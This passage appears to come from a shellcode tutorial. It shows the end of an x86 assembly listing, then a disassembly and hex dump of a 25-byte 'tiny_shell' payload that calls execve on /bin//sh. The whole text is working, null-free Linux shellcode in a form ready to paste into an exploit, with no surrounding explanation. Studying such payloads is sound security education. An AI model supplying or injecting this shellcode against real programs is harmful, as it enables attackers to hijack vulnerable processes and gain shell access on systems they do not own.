mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80

$ ndisasm -B32 tiny_shell
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f
00000008  682F62696E        push dword 0x6e69622f
0000000D  89E3              mov ebx,esp
0000000F  50                push eax
00000010  89E2              mov edx,esp
00000012  53                push ebx
00000013  89E1              mov ecx,esp
00000015  B00B              mov al,0xb
00000017  CD80              int 0x80

$ xxd tiny_shell
0000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350  1.Ph//shh/bin..P
0000010: 89e2 5389 e1b0 0bcd 80                   ..S......

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